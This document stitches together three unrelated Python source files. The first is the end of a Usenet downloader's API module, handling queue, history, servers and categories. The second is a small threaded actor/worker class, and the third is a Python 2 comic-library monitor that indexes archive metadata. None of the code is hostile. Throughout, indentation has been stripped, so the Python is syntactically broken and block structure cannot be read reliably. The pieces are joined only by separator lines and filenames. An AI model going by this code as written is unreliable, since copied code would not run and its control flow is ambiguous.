elif isinstance(lst, tuple):
text = self._tuple(keyw, lst)
elif keyw:
text = "<%s>%s</%s>\n" % (keyw, xml_name(lst), keyw)
else:
text = ""
return text
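# Minimal usage sketch of the XML maker above, with an assumed input list:
#   xml_factory().run("categories", ["movies", "tv"])
#   -> '<categories><category>movies</category>\n<category>tv</category>\n</categories>\n'
# The singular element name comes from plural_to_single(), defined further down in this module.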
def handle_server_api(output, kwargs):
""" Special handler for API-call 'set_config' [servers] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if name:
server = config.get_config("servers", name)
if server:
server.set_dict(kwargs)
old_name = name
else:
config.ConfigServer(name, kwargs)
old_name = None
sabnzbd.Downloader.update_server(old_name, name)
return name
def handle_rss_api(output, kwargs):
""" Special handler for API-call 'set_config' [rss] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if not name:
return None
feed = config.get_config("rss", name)
if feed:
feed.set_dict(kwargs)
else:
config.ConfigRSS(name, kwargs)
action = kwargs.get("filter_action")
if action in ("add", "update"):
# Use the general function, but catch the redirect-raise
try:
kwargs["feed"] = name
sabnzbd.interface.ConfigRss("/").internal_upd_rss_filter(**kwargs)
except cherrypy.HTTPRedirect:
pass
elif action == "delete":
# Use the general function, but catch the redirect-raise
try:
kwargs["feed"] = name
sabnzbd.interface.ConfigRss("/").internal_del_rss_filter(**kwargs)
except cherrypy.HTTPRedirect:
pass
return name
def handle_cat_api(output, kwargs):
""" Special handler for API-call 'set_config' [categories] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if not name:
return None
feed = config.get_config("categories", name)
if feed:
feed.set_dict(kwargs)
else:
config.ConfigCat(name, kwargs)
return name
def build_status(skip_dashboard=False, output=None):
# build up header full of basic information
info = build_header(trans_functions=not output)
info["logfile"] = sabnzbd.LOGFILE
info["weblogfile"] = sabnzbd.WEBLOGFILE
info["loglevel"] = str(cfg.log_level())
info["folders"] = sabnzbd.NzbQueue.scan_jobs(all_jobs=False, action=False)
info["configfn"] = config.get_filename()
# Dashboard: Speed of System
info["cpumodel"] = getcpu()
info["pystone"] = sabnzbd.PYSTONE_SCORE
# Dashboard: Speed of Download directory:
info["downloaddir"] = cfg.download_dir.get_clipped_path()
info["downloaddirspeed"] = sabnzbd.DOWNLOAD_DIR_SPEED
# Dashboard: Speed of Complete directory:
info["completedir"] = cfg.complete_dir.get_clipped_path()
info["completedirspeed"] = sabnzbd.COMPLETE_DIR_SPEED
# Dashboard: Measured download-speed
info["internetbandwidth"] = sabnzbd.INTERNET_BANDWIDTH
# Dashboard: Connection information
if not int_conv(skip_dashboard):
info["localipv4"] = localipv4()
info["publicipv4"] = publicipv4()
info["ipv6"] = ipv6()
# Dashboard: DNS-check
try:
addresslookup(cfg.selftest_host())
info["dnslookup"] = "OK"
except:
info["dnslookup"] = None
info["servers"] = []
servers = sorted(sabnzbd.Downloader.servers[:], key=lambda svr: "%02d%s" % (svr.priority, svr.displayname.lower()))
for server in servers:
serverconnections = []
connected = 0
for nw in server.idle_threads[:]:
if nw.connected:
connected += 1
for nw in server.busy_threads[:]:
article = nw.article
art_name = ""
nzf_name = ""
nzo_name = ""
if article:
nzf = article.nzf
nzo = nzf.nzo
art_name = article.article
# filename field is not always present
try:
nzf_name = nzf.filename
except: # attribute error
nzf_name = nzf.subject
nzo_name = nzo.final_name
# For the templates or for JSON
if output:
thread_info = {"thrdnum": nw.thrdnum, "art_name": art_name, "nzf_name": nzf_name, "nzo_name": nzo_name}
serverconnections.append(thread_info)
else:
serverconnections.append((nw.thrdnum, art_name, nzf_name, nzo_name))
if nw.connected:
connected += 1
if server.warning and not (connected or server.errormsg):
connected = server.warning
if server.request and not server.info:
connected = T(" Resolving address").replace(" ", "")
# For the templates or for JSON
if output:
server_info = {
"servername": server.displayname,
"serveractiveconn": connected,
"servertotalconn": server.threads,
"serverconnections": serverconnections,
"serverssl": server.ssl,
"serversslinfo": server.ssl_info,
"serveractive": server.active,
"servererror": server.errormsg,
"serverpriority": server.priority,
"serveroptional": server.optional,
}
info["servers"].append(server_info)
else:
info["servers"].append(
(
server.displayname,
"",
connected,
serverconnections,
server.ssl,
server.active,
server.errormsg,
server.priority,
server.optional,
)
)
info["warnings"] = sabnzbd.GUIHANDLER.content()
return info
def build_queue(start=0, limit=0, trans=False, output=None, search=None):
# build up header full of basic information
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header(
search=search, start=start, limit=limit, output=output
)
datestart = datetime.datetime.now()
limit = int_conv(limit)
start = int_conv(start)
info["refresh_rate"] = str(cfg.refresh_rate()) if cfg.refresh_rate() > 0 else ""
info["scripts"] = list_scripts()
info["categories"] = list_cats(output is None)
info["rating_enable"] = bool(cfg.rating_enable())
info["noofslots"] = q_size
info["start"] = start
info["limit"] = limit
info["finish"] = info["start"] + info["limit"]
n = start
running_bytes = bytes_left_previous_page
slotinfo = []
for pnfo in pnfo_list:
nzo_id = pnfo.nzo_id
bytesleft = pnfo.bytes_left
bytes_total = pnfo.bytes
average_date = pnfo.avg_date
is_propagating = (pnfo.avg_stamp + float(cfg.propagation_delay() * 60)) > time.time()
status = pnfo.status
priority = pnfo.priority
mbleft = bytesleft / MEBI
mb = bytes_total / MEBI
slot = {}
slot["index"] = n
slot["nzo_id"] = str(nzo_id)
slot["unpackopts"] = str(opts_to_pp(pnfo.repair, pnfo.unpack, pnfo.delete))
slot["priority"] = INTERFACE_PRIORITIES.get(priority, NORMAL_PRIORITY)
slot["script"] = pnfo.script if pnfo.script else "None"
slot["filename"] = pnfo.filename
slot["labels"] = pnfo.labels
slot["password"] = pnfo.password if pnfo.password else ""
slot["cat"] = pnfo.category if pnfo.category else "None"
slot["mbleft"] = "%.2f" % mbleft
slot["mb"] = "%.2f" % mb
slot["size"] = to_units(bytes_total, "B")
slot["sizeleft"] = to_units(bytesleft, "B")
slot["percentage"] = "%s" % (int(((mb - mbleft) / mb) * 100)) if mb != mbleft else "0"
slot["mbmissing"] = "%.2f" % (pnfo.bytes_missing / MEBI)
slot["direct_unpack"] = pnfo.direct_unpack
if not output:
slot["mb_fmt"] = locale.format_string("%d", int(mb), True)
slot["mbdone_fmt"] = locale.format_string("%d", int(mb - mbleft), True)
if not sabnzbd.Downloader.paused and status not in (Status.PAUSED, Status.FETCHING, Status.GRABBING):
if is_propagating:
slot["status"] = Status.PROP
elif status == Status.CHECKING:
slot["status"] = Status.CHECKING
else:
slot["status"] = Status.DOWNLOADING
else:
# Ensure compatibility of API status
if status == Status.DELETED or priority == FORCE_PRIORITY:
status = Status.DOWNLOADING
slot["status"] = "%s" % status
if (
sabnzbd.Downloader.paused
or sabnzbd.Downloader.postproc
or is_propagating
or status not in (Status.DOWNLOADING, Status.FETCHING, Status.QUEUED)
) and priority != FORCE_PRIORITY:
slot["timeleft"] = "0:00:00"
slot["eta"] = "unknown"
else:
running_bytes += bytesleft
slot["timeleft"] = calc_timeleft(running_bytes, bytespersec)
try:
datestart = datestart + datetime.timedelta(seconds=bytesleft / bytespersec)
# new eta format: 16:00 Fri 07 Feb
slot["eta"] = datestart.strftime(time_format("%H:%M %a %d %b"))
except:
datestart = datetime.datetime.now()
slot["eta"] = "unknown"
# Do not show age when it's not known
if average_date.year < 2000:
slot["avg_age"] = "-"
else:
slot["avg_age"] = calc_age(average_date, bool(trans))
rating = sabnzbd.Rating.get_rating_by_nzo(nzo_id)
slot["has_rating"] = rating is not None
if rating:
slot["rating_avg_video"] = rating.avg_video
slot["rating_avg_audio"] = rating.avg_audio
slotinfo.append(slot)
n += 1
if slotinfo:
info["slots"] = slotinfo
else:
info["slots"] = []
return info, pnfo_list, bytespersec
def fast_queue():
""" Return paused, bytes_left, bpsnow, time_left """
    bytes_left = sabnzbd.NzbQueue.remaining()
paused = sabnzbd.Downloader.paused
bpsnow = sabnzbd.BPSMeter.bps
time_left = calc_timeleft(bytes_left, bpsnow)
return paused, bytes_left, bpsnow, time_left
def build_file_list(nzo_id: str):
"""Build file lists for specified job"""
jobs = []
    nzo = sabnzbd.NzbQueue.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
finished_files = pnfo.finished_files
active_files = pnfo.active_files
queued_files = pnfo.queued_files
for nzf in finished_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "finished",
}
)
for nzf in active_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "active",
}
)
for nzf in queued_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"set": nzf.setname,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "queued",
}
)
return jobs
def options_list(output):
return report(
output,
keyword="options",
data={
"sabyenc": sabnzbd.decoder.SABYENC_ENABLED,
"par2": sabnzbd.newsunpack.PAR2_COMMAND,
"multipar": sabnzbd.newsunpack.MULTIPAR_COMMAND,
"rar": sabnzbd.newsunpack.RAR_COMMAND,
"zip": sabnzbd.newsunpack.ZIP_COMMAND,
"7zip": sabnzbd.newsunpack.SEVEN_COMMAND,
"nice": sabnzbd.newsunpack.NICE_COMMAND,
"ionice": sabnzbd.newsunpack.IONICE_COMMAND,
},
)
def retry_job(job, new_nzb=None, password=None):
""" Re enter failed job in the download queue """
if job:
history_db = sabnzbd.get_db_connection()
futuretype, url, pp, script, cat = history_db.get_other(job)
if futuretype:
nzo_id = sabnzbd.add_url(url, pp, script, cat)
else:
path = history_db.get_path(job)
nzo_id = sabnzbd.NzbQueue.repair_job(path, new_nzb, password)
if nzo_id:
# Only remove from history if we repaired something
history_db.remove_history(job)
return nzo_id
return None
def retry_all_jobs():
""" Re enter all failed jobs in the download queue """
# Fetch all retryable folders from History
items = sabnzbd.api.build_history()[0]
nzo_ids = []
for item in items:
if item["retry"]:
nzo_ids.append(retry_job(item["nzo_id"]))
return nzo_ids
def del_job_files(job_paths):
""" Remove files of each path in the list """
for path in job_paths:
if path and clip_path(path).lower().startswith(cfg.download_dir.get_clipped_path().lower()):
remove_all(path, recursive=True)
def del_hist_job(job, del_files):
""" Remove history element """
if job:
path = sabnzbd.PostProcessor.get_path(job)
if path:
sabnzbd.PostProcessor.delete(job, del_files=del_files)
else:
history_db = sabnzbd.get_db_connection()
remove_all(history_db.get_path(job), recursive=True)
history_db.remove_history(job)
def Tspec(txt):
""" Translate special terms """
if txt == "None":
return T("None")
elif txt in ("Default", "*"):
return T("Default")
else:
return txt
_SKIN_CACHE = {} # Stores pre-translated acronyms
def Ttemplate(txt):
"""Translation function for Skin texts
    This special version is to be used in interface.py for template processing,
    to be passed as the $T function: so { ..., 'T' : Ttemplate, ...}
"""
global _SKIN_CACHE
if txt in _SKIN_CACHE:
return _SKIN_CACHE[txt]
else:
        # We need to escape the " and ' to be JS/JSON-string-safe
        # Saving it in a dictionary is 20x faster on the next look-up
        tra = T(SKIN_TEXT.get(txt, txt)).replace('"', '&quot;').replace("'", '&apos;')
_SKIN_CACHE[txt] = tra
return tra
def clear_trans_cache():
""" Clean cache for skin translations """
global _SKIN_CACHE
_SKIN_CACHE = {}
sabnzbd.WEBUI_READY = True
def build_header(webdir="", output=None, trans_functions=True):
""" Build the basic header """
try:
uptime = calc_age(sabnzbd.START)
except:
uptime = "-"
speed_limit = sabnzbd.Downloader.get_limit()
if speed_limit <= 0:
speed_limit = 100
speed_limit_abs = sabnzbd.Downloader.get_limit_abs()
if speed_limit_abs <= 0:
speed_limit_abs = ""
diskspace_info = diskspace()
header = {}
# We don't output everything for API
if not output:
# These are functions, and cause problems for JSON
if trans_functions:
header["T"] = Ttemplate
header["Tspec"] = Tspec
header["uptime"] = uptime
header["color_scheme"] = sabnzbd.WEB_COLOR or ""
header["helpuri"] = "https://sabnzbd.org/wiki/"
header["restart_req"] = sabnzbd.RESTART_REQ
header["pid"] = os.getpid()
header["active_lang"] = cfg.language()
header["my_lcldata"] = clip_path(sabnzbd.DIR_LCLDATA)
header["my_home"] = clip_path(sabnzbd.DIR_HOME)
header["webdir"] = webdir or sabnzbd.WEB_DIR
header["url_base"] = cfg.url_base()
header["nt"] = sabnzbd.WIN32
header["darwin"] = sabnzbd.DARWIN
header["power_options"] = sabnzbd.WIN32 or sabnzbd.DARWIN or sabnzbd.LINUX_POWER
header["pp_pause_event"] = sabnzbd.Scheduler.pp_pause_event
header["apikey"] = cfg.api_key()
header["new_release"], header["new_rel_url"] = sabnzbd.NEW_VERSION
header["version"] = sabnzbd.__version__
header["paused"] = bool(sabnzbd.Downloader.paused or sabnzbd.Downloader.postproc)
header["pause_int"] = sabnzbd.Scheduler.pause_int()
header["paused_all"] = sabnzbd.PAUSED_ALL
header["diskspace1"] = "%.2f" % diskspace_info["download_dir"][1]
header["diskspace2"] = "%.2f" % diskspace_info["complete_dir"][1]
header["diskspace1_norm"] = to_units(diskspace_info["download_dir"][1] * GIGI)
header["diskspace2_norm"] = to_units(diskspace_info["complete_dir"][1] * GIGI)
header["diskspacetotal1"] = "%.2f" % diskspace_info["download_dir"][0]
header["diskspacetotal2"] = "%.2f" % diskspace_info["complete_dir"][0]
header["loadavg"] = loadavg()
header["speedlimit"] = "{1:0.{0}f}".format(int(speed_limit % 1 > 0), speed_limit)
header["speedlimit_abs"] = "%s" % speed_limit_abs
header["have_warnings"] = str(sabnzbd.GUIHANDLER.count())
header["finishaction"] = sabnzbd.QUEUECOMPLETE
header["quota"] = to_units(sabnzbd.BPSMeter.quota)
header["have_quota"] = bool(sabnzbd.BPSMeter.quota > 0.0)
header["left_quota"] = to_units(sabnzbd.BPSMeter.left)
anfo = sabnzbd.ArticleCache.cache_info()
header["cache_art"] = str(anfo.article_sum)
header["cache_size"] = to_units(anfo.cache_size, "B")
header["cache_max"] = str(anfo.cache_limit)
return header
def build_queue_header(search=None, start=0, limit=0, output=None):
""" Build full queue header """
header = build_header(output=output)
bytespersec = sabnzbd.BPSMeter.bps
qnfo = sabnzbd.NzbQueue.queue_info(search=search, start=start, limit=limit)
bytesleft = qnfo.bytes_left
bytes_total = qnfo.bytes
header["kbpersec"] = "%.2f" % (bytespersec / KIBI)
header["speed"] = to_units(bytespersec)
header["mbleft"] = "%.2f" % (bytesleft / MEBI)
header["mb"] = "%.2f" % (bytes_total / MEBI)
header["sizeleft"] = to_units(bytesleft, "B")
header["size"] = to_units(bytes_total, "B")
header["noofslots_total"] = qnfo.q_fullsize
if sabnzbd.Downloader.paused or sabnzbd.Downloader.postproc:
status = Status.PAUSED
elif bytespersec > 0:
status = Status.DOWNLOADING
else:
status = "Idle"
header["status"] = status
header["timeleft"] = calc_timeleft(bytesleft, bytespersec)
try:
datestart = datetime.datetime.now() + datetime.timedelta(seconds=bytesleft / bytespersec)
# new eta format: 16:00 Fri 07 Feb
header["eta"] = datestart.strftime(time_format("%H:%M %a %d %b"))
except:
header["eta"] = T("unknown")
return header, qnfo.list, bytespersec, qnfo.q_fullsize, qnfo.bytes_left_previous_page
def build_history(start=0, limit=0, search=None, failed_only=0, categories=None):
"""Combine the jobs still in post-processing and the database history"""
if not limit:
limit = 1000000
# Grab any items that are active or queued in postproc
postproc_queue = sabnzbd.PostProcessor.get_queue()
# Filter out any items that don't match the search term or category
if postproc_queue:
# It would be more efficient to iterate only once, but we accept the penalty for code clarity
if isinstance(search, list):
postproc_queue = [nzo for nzo in postproc_queue if nzo.cat in categories]
if isinstance(search, str):
# Replace * with .* and ' ' with .
search_text = search.strip().replace("*", ".*").replace(" ", ".*") + ".*?"
try:
re_search = re.compile(search_text, re.I)
postproc_queue = [nzo for nzo in postproc_queue if re_search.search(nzo.final_name)]
except:
logging.error(T("Failed to compile regex for search term: %s"), search_text)
# Multi-page support for postproc items
postproc_queue_size = len(postproc_queue)
if start > postproc_queue_size:
# On a page where we shouldn't show postproc items
postproc_queue = []
database_history_limit = limit
else:
try:
if limit:
postproc_queue = postproc_queue[start : start + limit]
else:
postproc_queue = postproc_queue[start:]
except:
pass
# Remove the amount of postproc items from the db request for history items
database_history_limit = max(limit - len(postproc_queue), 0)
database_history_start = max(start - postproc_queue_size, 0)
# Acquire the db instance
try:
history_db = sabnzbd.get_db_connection()
close_db = False
except:
# Required for repairs at startup because Cherrypy isn't active yet
history_db = HistoryDB()
close_db = True
# Fetch history items
if not database_history_limit:
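        # Only the total count is needed from this call; the single fetched row is discarded below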
items, fetched_items, total_items = history_db.fetch_history(
database_history_start, 1, search, failed_only, categories
)
items = []
else:
items, fetched_items, total_items = history_db.fetch_history(
database_history_start, database_history_limit, search, failed_only, categories
)
# Reverse the queue to add items to the top (faster than insert)
items.reverse()
# Add the postproc items to the top of the history
items = get_active_history(postproc_queue, items)
# Un-reverse the queue
items.reverse()
# Global check if rating is enabled
rating_enabled = cfg.rating_enable()
for item in items:
item["size"] = to_units(item["bytes"], "B")
if "loaded" not in item:
item["loaded"] = False
path = item.get("path", "")
item["retry"] = int_conv(item.get("status") == Status.FAILED and path and os.path.exists(path))
# Retry of failed URL-fetch
if item["report"] == "future":
item["retry"] = True
if rating_enabled:
rating = sabnzbd.Rating.get_rating_by_nzo(item["nzo_id"])
item["has_rating"] = rating is not None
if rating:
item["rating_avg_video"] = rating.avg_video
item["rating_avg_audio"] = rating.avg_audio
item["rating_avg_vote_up"] = rating.avg_vote_up
item["rating_avg_vote_down"] = rating.avg_vote_down
item["rating_user_video"] = rating.user_video
item["rating_user_audio"] = rating.user_audio
item["rating_user_vote"] = rating.user_vote
total_items += postproc_queue_size
fetched_items = len(items)
if close_db:
history_db.close()
return items, fetched_items, total_items
def get_active_history(queue, items):
""" Get the currently in progress and active history queue. """
for nzo in queue:
item = {}
(
item["completed"],
item["name"],
item["nzb_name"],
item["category"],
item["pp"],
item["script"],
item["report"],
item["url"],
item["status"],
item["nzo_id"],
item["storage"],
item["path"],
item["script_log"],
item["script_line"],
item["download_time"],
item["postproc_time"],
item["stage_log"],
item["downloaded"],
item["fail_message"],
item["url_info"],
item["bytes"],
_,
_,
item["password"],
) = build_history_info(nzo)
item["action_line"] = nzo.action_line
item = unpack_history_info(item)
item["loaded"] = nzo.pp_active
if item["bytes"]:
item["size"] = to_units(item["bytes"], "B")
else:
item["size"] = ""
items.append(item)
return items
def calc_timeleft(bytesleft, bps):
""" Calculate the time left in the format HH:MM:SS """
try:
if bytesleft <= 0:
return "0:00:00"
totalseconds = int(bytesleft / bps)
minutes, seconds = divmod(totalseconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
if minutes < 10:
minutes = "0%s" % minutes
if seconds < 10:
seconds = "0%s" % seconds
if days > 0:
if hours < 10:
hours = "0%s" % hours
return "%s:%s:%s:%s" % (days, hours, minutes, seconds)
else:
return "%s:%s:%s" % (hours, minutes, seconds)
except:
return "0:00:00"
def list_scripts(default=False, none=True):
""" Return a list of script names, optionally with 'Default' added """
lst = []
path = cfg.script_dir.get_path()
if path and os.access(path, os.R_OK):
for script in globber_full(path):
if os.path.isfile(script):
if (
(
sabnzbd.WIN32
and os.path.splitext(script)[1].lower() in PATHEXT
and not win32api.GetFileAttributes(script) & win32file.FILE_ATTRIBUTE_HIDDEN
)
or script.endswith(".py")
or (not sabnzbd.WIN32 and userxbit(script) and not os.path.basename(script).startswith("."))
):
lst.append(os.path.basename(script))
if none:
lst.insert(0, "None")
if default:
lst.insert(0, "Default")
return lst
def list_cats(default=True):
"""Return list of (ordered) categories,
when default==False use '*' for Default category
"""
lst = [cat["name"] for cat in config.get_ordered_categories()]
if default:
lst.remove("*")
lst.insert(0, "Default")
return lst
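# Sketch of list_cats() with an assumed config containing the categories '*', 'movies' and 'tv':
#   list_cats(True)  -> ['Default', 'movies', 'tv']   (the '*' slot is presented as 'Default')
#   list_cats(False) -> ['*', 'movies', 'tv']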
_PLURAL_TO_SINGLE = {
"categories": "category",
"servers": "server",
"rss": "feed",
"scripts": "script",
"warnings": "warning",
"files": "file",
"jobs": "job",
}
def plural_to_single(kw, def_kw=""):
try:
return _PLURAL_TO_SINGLE[kw]
except KeyError:
return def_kw
def del_from_section(kwargs):
""" Remove keyword in section """
section = kwargs.get("section", "")
if section in ("servers", "rss", "categories"):
keyword = kwargs.get("keyword")
if keyword:
item = config.get_config(section, keyword)
if item:
item.delete()
del item
config.save_config()
if section == "servers":
sabnzbd.Downloader.update_server(keyword, None)
return True
else:
return False
def history_remove_failed():
""" Remove all failed jobs from history, including files """
logging.info("Scheduled removal of all failed jobs")
with HistoryDB() as history_db:
del_job_files(history_db.get_failed_paths())
history_db.remove_failed()
def history_remove_completed():
""" Remove all completed jobs from history """
logging.info("Scheduled removal of all completed jobs")
with HistoryDB() as history_db:
history_db.remove_completed()
|
base_worker.py
|
# -*- coding: utf-8 -*-
# @Author: Macsnow
# @Date: 2017-05-15 14:03:39
# @Last Modified by: Macsnow
# @Last Modified time: 2017-05-19 17:01:33
from queue import Queue
from threading import Thread, Event
class WorkerExit(Exception):
pass
class BaseWorker(object):
def __init__(self):
self._mailbox = Queue()
super(BaseWorker, self).__init__()
def send(self, msg):
self._mailbox.put(msg)
def recv(self):
msg = self._mailbox.get()
if msg is WorkerExit:
raise WorkerExit()
return msg
def close(self):
self.send(WorkerExit)
def start(self):
self._terminated = Event()
t = Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except WorkerExit:
pass
finally:
self._terminated.set()
def status(self):
return self._terminated.is_set()
def join(self):
self._terminated.wait()
def run(self):
raise NotImplementedError
class Worker(BaseWorker):
def recv_nowait(self):
if not self._mailbox.empty():
msg = self._mailbox.get()
if msg is WorkerExit:
raise WorkerExit()
return msg
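# Worker.recv_nowait() above is the non-blocking variant: when the mailbox is empty it simply
# falls through and returns None instead of blocking like BaseWorker.recv().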
if __name__ == '__main__':
class PrintActor(BaseWorker):
def run(self):
while True:
msg = self.recv()
print('Got:', msg)
# raise RuntimeError
p = PrintActor()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.join()
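    # Note: close() only enqueues the WorkerExit sentinel and start() always spins up a fresh
    # thread, so the same actor can be started, closed and restarted as sketched above.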
class TaggedActor(BaseWorker):
def run(self):
while True:
tag, *payload = self.recv()
getattr(self, 'do_' + tag)(*payload)
        # Methods corresponding to different message tags
def do_A(self, x):
print('Running A', x)
def do_B(self, x, y):
print('Running B', x, y)
# Example
a = TaggedActor()
a.start()
a.send(('A', 1)) # Invokes do_A(1)
a.send(('B', 2, 3)) # Invokes do_B(2,3)
a.close()
a.join()
|
monitor.py
|
#!/usr/bin/env python
import sys
import os
import hashlib
import md5
import mmap
from datetime import datetime
import time
import threading
import Queue
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
import watchdog
from libs.comictaggerlib.comicarchive import *
from libs.comictaggerlib.issuestring import *
import utils
from database import *
class MonitorEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, monitor):
self.monitor = monitor
self.ignore_directories = True
def on_any_event(self,event):
if event.is_directory:
return
self.monitor.handleSingleEvent(event)
class Monitor():
def __init__(self, dm, paths):
self.dm = dm
self.style = MetaDataStyle.CIX
self.queue = Queue.Queue(0)
self.paths = paths
self.eventList = []
self.mutex = threading.Lock()
self.eventProcessingTimer = None
self.quit_when_done = False # for debugging/testing
self.status = "IDLE"
self.statusdetail = ""
self.scancomplete_ts = ""
def start(self):
self.thread = threading.Thread(target=self.mainLoop)
self.thread.daemon = True
self.quit = False
self.thread.start()
def stop(self):
self.quit = True
self.thread.join()
def mainLoop(self):
logging.debug("Monitor: started main loop.")
self.session = self.dm.Session()
observer = Observer()
self.eventHandler = MonitorEventHandler(self)
for path in self.paths:
if os.path.exists(path):
observer.schedule(self.eventHandler, path, recursive=True)
observer.start()
while True:
try:
(msg, args) = self.queue.get(block=True, timeout=1)
except:
msg = None
#dispatch messages
if msg == "scan":
self.dofullScan(self.paths)
if msg == "events":
self.doEventProcessing(args)
#time.sleep(1)
if self.quit:
break
self.session.close()
self.session = None
observer.stop()
logging.debug("Monitor: stopped main loop.")
def scan(self):
self.queue.put(("scan", None))
def handleSingleEvent(self, event):
# events may happen in clumps. start a timer
# to defer processing. if the timer is already going,
# it will be canceled
# in the future there can be more smarts about
# granular file events. for now this will be
        # good enough to just get a trigger that *something*
# changed
self.mutex.acquire()
if self.eventProcessingTimer is not None:
self.eventProcessingTimer.cancel()
self.eventProcessingTimer = threading.Timer(30, self.handleEventProcessing)
self.eventProcessingTimer.start()
self.mutex.release()
def handleEventProcessing(self):
# trigger a full rescan
self.mutex.acquire()
self.scan()
# remove the timer
if self.eventProcessingTimer is not None:
self.eventProcessingTimer = None
self.mutex.release()
def checkIfRemovedOrModified(self, comic, pathlist):
remove = False
def inFolderlist(filepath, pathlist):
for p in pathlist:
if p in filepath:
return True
return False
if not (os.path.exists(comic.path)):
# file is missing, remove it from the comic table, add it to deleted table
logging.debug(u"Removing missing {0}".format(comic.path))
remove = True
elif not inFolderlist(comic.path, pathlist):
logging.debug(u"Removing unwanted {0}".format(comic.path))
remove = True
else:
# file exists. check the mod date.
# if it's been modified, remove it, and it'll be re-added
#curr = datetime.datetime.fromtimestamp(os.path.getmtime(comic.path))
curr = datetime.utcfromtimestamp(os.path.getmtime(comic.path))
prev = comic.mod_ts
if curr != prev:
logging.debug(u"Removed modifed {0}".format(comic.path))
remove = True
if remove:
self.removeComic(comic)
self.remove_count += 1
def getComicMetadata(self, path):
#print time.time() - start_time, "seconds"
ca = ComicArchive(path, default_image_path=AppFolders.imagePath("default.jpg"))
if ca.seemsToBeAComicArchive():
#print >> sys.stdout, u"Adding {0}... \r".format(count),
logging.debug(u"Reading in {0} {1}\r".format(self.read_count, path))
sys.stdout.flush()
self.read_count += 1
if ca.hasMetadata( MetaDataStyle.CIX ):
style = MetaDataStyle.CIX
elif ca.hasMetadata( MetaDataStyle.CBI ):
style = MetaDataStyle.CBI
else:
style = None
if style is not None:
md = ca.readMetadata(style)
else:
# No metadata in comic. make some guesses from the filename
md = ca.metadataFromFilename()
md.path = ca.path
md.page_count = ca.page_count
md.mod_ts = datetime.utcfromtimestamp(os.path.getmtime(ca.path))
md.filesize = os.path.getsize(md.path)
md.hash = ""
#logging.debug("before hash")
#md5 = hashlib.md5()
#md5.update(open(md.path, 'r').read())
#md.hash = unicode(md5.hexdigest())
#logging.debug("after hash")
return md
return None
def removeComic(self, comic):
deleted = DeletedComic()
deleted.comic_id = comic.id
self.session.add(deleted)
self.session.delete(comic)
def fetchObjByName(self, obj_dict, instance_name,):
try:
#logging.debug( u"FETCH:= {0} {1} {2}".format(obj.name, obj.id, type(obj)))
obj = None
obj = obj_dict[instance_name]
except Exception as e:
print "-------->", e, instance_name
return obj
def addComicFromMetadata(self, md ):
logging.debug(u"Adding {0} {1}\r".format(self.add_count, md.path))
sys.stdout.flush()
self.add_count += 1
comic = Comic()
# store full path, and filename and folder separately, for search efficiency,
# at the cost of redundant storage
comic.folder, comic.file = os.path.split(md.path)
comic.path = md.path
comic.page_count = md.page_count
comic.mod_ts = md.mod_ts
comic.hash = md.hash
comic.filesize = md.filesize
if not md.isEmpty:
if md.series is not None:
comic.series = unicode(md.series)
if md.issue is not None:
comic.issue = unicode(md.issue)
comic.issue_num = IssueString(unicode(comic.issue)).asFloat()
if md.year is not None:
try:
day = 1
month = 1
if md.month is not None:
month = int(md.month)
if md.day is not None:
day = int(md.day)
year = int(md.year)
comic.date = datetime(year,month,day)
except:
pass
comic.year = md.year
comic.month = md.month
comic.day = md.day
if md.volume is not None:
comic.volume = int(md.volume)
if md.publisher is not None:
comic.publisher = unicode(md.publisher)
if md.title is not None:
comic.title = unicode(md.title)
if md.comments is not None:
comic.comments = unicode(md.comments)
if md.imprint is not None:
comic.imprint = unicode(md.imprint)
if md.webLink is not None:
comic.weblink = unicode(md.webLink)
self.session.add(comic)
if md.characters is not None:
for c in list(set(md.characters.split(","))):
character = self.fetchObjByName( self.character_dict, c.strip())
comic.characters_raw.append(character)
#comic.characters_raw.append(self.character_objs[0])
if md.teams is not None:
for t in list(set(md.teams.split(","))):
team = self.fetchObjByName( self.team_dict, t.strip())
comic.teams_raw.append(team)
if md.locations is not None:
for l in list(set(md.locations.split(","))):
location = self.fetchObjByName( self.location_dict, l.strip())
comic.locations_raw.append(location)
if md.storyArc is not None:
for sa in list(set(md.storyArc.split(","))):
storyarc = self.fetchObjByName( self.storyarc_dict, sa.strip())
comic.storyarcs_raw.append(storyarc)
pass
if md.genre is not None:
for g in list(set(md.genre.split(","))):
genre = self.fetchObjByName( self.genre_dict, g.strip())
comic.genres_raw.append(genre)
pass
if md.tags is not None:
for gt in list(set(md.tags)):
generictag = self.fetchObjByName( self.generictag_dict, gt.strip())
comic.generictags_raw.append(generictag)
pass
if md.credits is not None:
for credit in md.credits:
role = self.fetchObjByName( self.role_dict, credit['role'].lower().strip())
person = self.fetchObjByName( self.person_dict, credit['person'].strip())
comic.credits_raw.append(Credit(person, role))
#comic.credits_raw.append(Credit(self.person_objs[0], self.role_objs[0]))
pass
def buildChildSets(self, md):
if md.characters is not None:
for n in list(set(md.characters.split(","))):
self.character_names.add(n.strip())
if md.teams is not None:
for n in list(set(md.teams.split(","))):
self.team_names.add(n.strip())
